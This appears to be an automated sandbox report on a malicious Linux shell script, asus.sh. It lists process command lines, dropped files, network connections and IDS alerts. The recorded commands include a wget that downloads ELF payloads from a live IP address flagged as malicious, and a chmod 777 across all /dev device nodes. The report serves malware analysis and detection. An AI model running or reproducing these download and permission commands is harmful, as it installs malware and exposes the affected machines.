| File name: | asus.sh |
| Full analysis: | https://app.any.run/tasks/66866644-47dc-4464-8182-292d371eff2c |
| Verdict: | Malicious activity |
| Analysis date: | June 19, 2025, 06:14:49 |
| OS: | Ubuntu 22.04.2 |
| Tags: | |
| MIME: | text/plain |
| File info: | ASCII text |
| MD5: | 51040DED77ED8881EBCE7E2E9C31FE1A |
| SHA1: | BB73D5306F6F0A6ED7B891A49353CA157BC5762B |
| SHA256: | A09C12EB2A57BFE5326BFE0C36ED3CD2E5D4B41735F31407D87D3703CB20EC83 |
| SSDEEP: | 12:BFS64iSFSl6qheSFS0EU64iDl6qheD0ET:zSq2SFe2S0ZqDFeD0a |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 41395 | /bin/sh -c "sudo chown user /home/user/Desktop/asus\.sh && chmod +x /home/user/Desktop/asus\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/asus\.sh " | /usr/bin/dash | — | UbvyYXL4x2mYa65Q | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41396 | sudo chown user /home/user/Desktop/asus.sh | /usr/bin/sudo | — | dash | |||||||||||
User: root Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41397 | chown user /home/user/Desktop/asus.sh | /usr/bin/chown | — | sudo | |||||||||||
User: root Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41398 | chmod +x /home/user/Desktop/asus.sh | /usr/bin/chmod | — | dash | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41399 | sudo -iu user /home/user/Desktop/asus.sh | /usr/bin/sudo | — | dash | |||||||||||
User: root Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41401 | -bash --login -c \/home\/user\/Desktop\/asus\.sh | /usr/bin/bash | — | sudo | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41402 | /usr/bin/locale-check C.UTF-8 | /usr/bin/locale-check | — | bash | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41403 | wget http://45.125.66.79/j/mle1 | /usr/bin/wget | bash | ||||||||||||
User: user Integrity Level: UNKNOWN Exit code: 768 Modules
| |||||||||||||||
| 41405 | chmod 777 autofs block bsg btrfs-control bus char console core cpu cpu_dma_latency cuse disk dma_heap dri ecryptfs fb0 fd full fuse hidraw0 hpet hugepages hwrng i2c-0 initctl input kmsg log loop0 loop1 loop10 loop11 loop12 loop13 loop14 loop15 loop16 loop17 loop18 loop19 loop2 loop3 loop4 loop5 loop6 loop7 loop8 loop9 loop-control mapper mcelog mem mqueue net null nvram port ppp psaux ptmx pts random rfkill rtc rtc0 sda sda1 sda2 sda3 sg0 shm snapshot snd stderr stdin stdout tty tty0 tty1 tty10 tty11 tty12 tty13 tty14 tty15 tty16 tty17 tty18 tty19 tty2 tty20 tty21 tty22 tty23 tty24 tty25 tty26 tty27 tty28 tty29 tty3 tty30 tty31 tty32 tty33 tty34 tty35 tty36 tty37 tty38 tty39 tty4 tty40 tty41 tty42 tty43 tty44 tty45 tty46 tty47 tty48 tty49 tty5 tty50 tty51 tty52 tty53 tty54 tty55 tty56 tty57 tty58 tty59 tty6 tty60 tty61 tty62 tty63 tty7 tty8 tty9 ttyprintk ttyS0 ttyS1 ttyS10 ttyS11 ttyS12 ttyS13 ttyS14 ttyS15 ttyS16 ttyS17 ttyS18 ttyS19 ttyS2 ttyS20 ttyS21 ttyS22 ttyS23 ttyS24 ttyS25 ttyS26 ttyS27 ttyS28 ttyS29 ttyS3 ttyS30 ttyS31 ttyS4 ttyS5 ttyS6 ttyS7 ttyS8 ttyS9 udmabuf uhid uinput urandom userfaultfd userio vcs vcs1 vcs2 vcs3 vcs4 vcs5 vcs6 vcsa vcsa1 vcsa2 vcsa3 vcsa4 vcsa5 vcsa6 vcsu vcsu1 vcsu2 vcsu3 vcsu4 vcsu5 vcsu6 vfio vga_arbiter vhci vhost-net vhost-vsock zero zfs | /usr/bin/chmod | — | bash | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 256 Modules
| |||||||||||||||
| 41406 | -bash --login -c \/home\/user\/Desktop\/asus\.sh | /usr/bin/bash | — | bash | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 32512 | |||||||||||||||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 41416 | wget | /tmp/mle1 | o | |
MD5:— | SHA256:— | |||
| 41430 | wget | /tmp/mbe1 (deleted) | o | |
MD5:— | SHA256:— | |||
| 41435 | wget | /tmp/a5le1 | o | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 195.181.175.40:443 | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | binary | 1.49 Mb | whitelisted |
— | — | GET | — | 185.125.190.96:80 | http://connectivity-check.ubuntu.com/ | unknown | — | — | whitelisted |
— | — | GET | 200 | 195.181.175.40:443 | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | binary | 1.49 Mb | whitelisted |
— | — | GET | 204 | 185.125.190.96:80 | http://connectivity-check.ubuntu.com/ | unknown | — | — | whitelisted |
— | — | GET | 200 | 169.150.255.184:443 | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | binary | 1.49 Mb | whitelisted |
— | — | GET | 200 | 195.181.175.40:443 | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | binary | 1.49 Mb | whitelisted |
— | — | POST | 200 | 185.125.188.54:443 | https://api.snapcraft.io/v2/snaps/refresh | unknown | binary | 45.5 Kb | whitelisted |
— | — | GET | — | 185.125.190.96:80 | http://connectivity-check.ubuntu.com/ | unknown | — | — | whitelisted |
— | — | POST | 200 | 185.125.188.58:443 | https://api.snapcraft.io/v2/snaps/refresh | unknown | binary | 45.5 Kb | whitelisted |
— | — | GET | 200 | 169.150.255.181:443 | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | binary | 1.49 Mb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 185.125.190.96:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted |
484 | avahi-daemon | 224.0.0.251:5353 | — | — | — | unknown |
— | — | 169.150.255.181:443 | odrs.gnome.org | — | GB | whitelisted |
512 | snapd | 185.125.188.54:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
41403 | wget | 45.125.66.79:80 | — | Tele Asia Limited | LT | malicious |
512 | snapd | 185.125.188.58:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
41408 | wget | 45.125.66.79:80 | — | Tele Asia Limited | LT | malicious |
41412 | wget | 45.125.66.79:80 | — | Tele Asia Limited | LT | malicious |
41416 | wget | 45.125.66.79:80 | — | Tele Asia Limited | LT | malicious |
512 | snapd | 185.125.188.59:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
Domain | IP | Reputation |
|---|---|---|
connectivity-check.ubuntu.com |
| whitelisted |
odrs.gnome.org |
| whitelisted |
google.com |
| whitelisted |
api.snapcraft.io |
| whitelisted |
13.100.168.192.in-addr.arpa |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
41403 | wget | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 5 |
41416 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
41430 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
41435 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
41403 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
41408 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
41412 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |